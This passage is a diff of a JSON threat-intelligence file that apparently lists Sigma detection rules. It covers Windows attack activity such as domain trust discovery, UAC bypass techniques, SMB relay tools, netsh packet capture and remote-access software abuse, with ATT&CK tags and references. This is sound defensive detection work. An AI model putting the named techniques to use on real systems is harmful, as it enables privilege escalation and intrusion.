Lambert), oscd.community, omkar72", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of the utilities by legitimate user for legitimate reason" + ], + "filename": "proc_creation_win_trust_discovery.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", + "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1482" + ] + }, + "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", + "value": "Domain Trust Discovery" + }, + { + "description": "Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020", + "meta": { + "author": "Markus Neis, Swisscom", + "creation_date": "2020/06/18", + "falsepositive": [ + "Will need to be looked for combinations of those processes" + ], + "filename": "proc_creation_win_apt_ke3chang_regadd.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml" + ], + "tags": [ + "attack.g0004", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "7b544661-69fc-419f-9a59-82ccc328f205", + "value": "Ke3chang Registry Key Modifications" + }, + { + "description": "Detects capture a network trace via netsh.exe trace functionality", + "meta": { + "author": "Kutepov Anton, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason" + ], + "filename": "proc_creation_win_netsh_packet_capture.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "d3c3861d-c504-4c77-ba55-224ba82d0118", + "value": "Capture a Network Trace with netsh.exe" + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "meta": { + "author": "Tim Burrell", + "creation_date": "2020/02/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_gallium_sha1.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml" ], "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1212", + "attack.command_and_control", + "attack.t1071" ] }, - "uuid": "d2eb17db-1d39-41dc-b57f-301f6512fa75", - "value": "Suspicious Command With Teams Objects Pathes" + "uuid": "440a56bf-7873-4439-940a-1c8a671073c2", + "value": "GALLIUM Sha1 Artefacts" }, { "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", @@ -56071,1611 +50339,619 @@ "value": "Terminal Service Process Spawn" }, { - "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/24", - "falsepositive": [ - "Legitimate files with these rare hacktool names" - ], - "filename": "proc_creation_win_tools_relay_attacks.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1557/001/", - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://pentestlab.blog/2017/04/13/hot-potato/", - "https://github.com/ohpe/juicy-potato", - "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes", - "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml" - ], - "tags": [ - "attack.execution", - "attack.t1557.001" - ] - }, - "uuid": "5589ab4f-a767-433c-961d-c91f3f704db1", - "value": "SMB Relay Attack Tools" - }, - { - "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/31", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_tools_uac_bypass_computerdefaults.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "3c05e90d-7eba-4324-9972-5d7f711a60a8", - "value": "UAC Bypass Tools Using ComputerDefaults" - }, - { - "description": "Detects the use of NirCmd tool for command execution, which could be the result of legitimate administrative activity", + "description": "Detects suspicious flags used by PsExec and PAExec but no usual program name in command line", "meta": { "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/01/24", + "creation_date": "2021/05/22", "falsepositive": [ - "Legitimate use by administrators" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" ], - "filename": "proc_creation_win_tool_nircmd.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.nirsoft.net/utils/nircmd.html", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://www.nirsoft.net/utils/nircmd2.html#using", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "4e2ed651-1906-4a59-a78a-18220fca1b22", - "value": "NirCmd Tool Execution" - }, - { - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali @nas_bench", - "creation_date": "2022/01/24", - "falsepositive": [ - "Legitimate use by administrators" - ], - "filename": "proc_creation_win_tool_nircmd_as_system.yml", + "filename": "proc_creation_win_susp_psexex_paexec_flags.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.nirsoft.net/utils/nircmd.html", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://www.nirsoft.net/utils/nircmd2.html#using", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" ], "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.resource_development", + "attack.t1587.001" ] }, - "uuid": "d9047477-0359-48c9-b8c7-792cedcdc9c4", - "value": "NirCmd Tool Execution As LOCAL SYSTEM" + "uuid": "207b0396-3689-42d9-8399-4222658efc99", + "value": "PsExec/PAExec Flags" }, { - "description": "Detects the use of NSudo tool for command execution", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/01/24", - "falsepositive": [ - "Legitimate use by administrators" - ], - "filename": "proc_creation_win_tool_nsudo_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://nsudo.m2team.org/en-us/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "771d1eb5-9587-4568-95fb-9ec44153a012", - "value": "NSudo Tool Execution" - }, - { - "description": "Detects PsExec service execution via default service image name", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/06/12", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_tool_psexec.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://jpcertcc.github.io/ToolAnalysisResultSheet", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_psexec.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", - "value": "PsExec Tool Execution" - }, - { - "description": "Detects the use of RunXCmd tool for command execution", + "description": "Detects cases in which an ISO files is opend within an archiver like 7Zip or Winrar, which is a sign of phishing as threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (mark of web)", "meta": { "author": "Florian Roth", - "creation_date": "2022/01/24", + "creation_date": "2022/06/07", "falsepositive": [ - "Legitimate use by administrators" + "Legitimate cases in which archives contain ISO or IMG files and the user opens the archive and the image via clicking and not extraction" ], - "filename": "proc_creation_win_tool_runx_as_system.yml", + "filename": "proc_creation_win_archiver_iso_phishing.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.d7xtech.com/free-software/runx/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" - ] - }, - "uuid": "93199800-b52a-4dec-b762-75212c196542", - "value": "RunXCmd Tool Execution As System" - }, - { - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", - "meta": { - "author": "frack113", - "creation_date": "2022/02/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_tor_browser.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tor_browser.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090.003" - ] - }, - "uuid": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", - "value": "Tor Client or Tor Browser Use" - }, - { - "description": "Detect use of TruffleSnout.exe", - "meta": { - "author": "frack113", - "creation_date": "2022/08/20", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_trufflesnout.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md", - "https://github.com/dsnezhkov/TruffleSnout", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trufflesnout.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ] - }, - "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", - "value": "Launch TruffleSnout Executable" - }, - { - "description": "Identifies execution of nltest.exe and dsquery.exe for domain trust discovery. This technique is used by attackers to enumerate Active Directory trusts.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, omkar72", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate use of the utilities by legitimate user for legitimate reason" - ], - "filename": "proc_creation_win_trust_discovery.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", - "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ] - }, - "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", - "value": "Domain Trust Discovery" - }, - { - "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_changepk_slui.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b", - "https://github.com/hfiref0x/UACME", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", - "value": "UAC Bypass Using ChangePK and SLUI" - }, - { - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", - "value": "UAC Bypass Using Disk Cleanup" - }, - { - "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate use of cmstp.exe utility by legitimate user" - ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", - "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" - ] - }, - "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", - "value": "Bypass UAC via CMSTP" - }, - { - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", - "value": "UAC Bypass Using Consent and Comctl32 - Process" - }, - { - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", - "value": "UAC Bypass Using DismHost" - }, - { - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_eventvwr.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/orange_8361/status/1518970259868626944", - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" - ] - }, - "uuid": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", - "value": "UAC Bypass Using Event Viewer RecentViews" - }, - { - "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate use of fodhelper.exe utility by legitimate user" - ], - "filename": "proc_creation_win_uac_bypass_fodhelper.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", - "value": "Bypass UAC via Fodhelper.exe" - }, - { - "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ] - }, - "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", - "value": "UAC Bypass via Windows Firewall Snap-In Hijack" - }, - { - "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/09/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_icmluautil.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", - "value": "UAC Bypass via ICMLuaUtil" - }, - { - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Wh04m1001/IDiagnosticProfileUAC", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "4cbef972-f347-4170-b62a-8253f6168e6d", - "value": "UAC Bypass Using IDiagnostic Profile" - }, - { - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", - "value": "UAC Bypass Using IEInstal - Process" - }, - { - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", - "value": "UAC Bypass Using MSConfig Token Modification - Process" - }, - { - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", - "value": "UAC Bypass Using NTFS Reparse Point - Process" - }, - { - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", - "value": "UAC Bypass Using PkgMgr and DISM" - }, - { - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_winsat.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "value": "UAC Bypass Abusing Winsat Path Parsing - Process" - }, - { - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_wmp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", - "value": "UAC Bypass Using Windows Media Player - Process" - }, - { - "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unknown sub processes of Wsreset.exe" - ], - "filename": "proc_creation_win_uac_bypass_wsreset.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html", - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", - "https://www.activecyber.us/activelabs/windows-uac-bypass", - "https://twitter.com/ReaQta/status/1222548288731217921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" - ] - }, - "uuid": "d797268e-28a9-49a7-b9a8-2f5039011c5c", - "value": "Bypass UAC via WSReset.exe" - }, - { - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", - "https://github.com/hfiref0x/UACME", - "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "value": "UAC Bypass WSReset" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "meta": { - "author": "frack113", - "creation_date": "2022/09/25", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_ultraviewer.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultraviewer.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503", - "value": "Use of UltraViewer Remote Access Software" - }, - { - "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", - "meta": { - "author": "frack113", - "creation_date": "2022/10/02", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_ultravnc.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ] - }, - "uuid": "145322e4-0fd3-486b-81ca-9addc75736d8", - "value": "Use of UltraVNC Remote Access Software" - }, - { - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", - "meta": { - "author": "frack113", 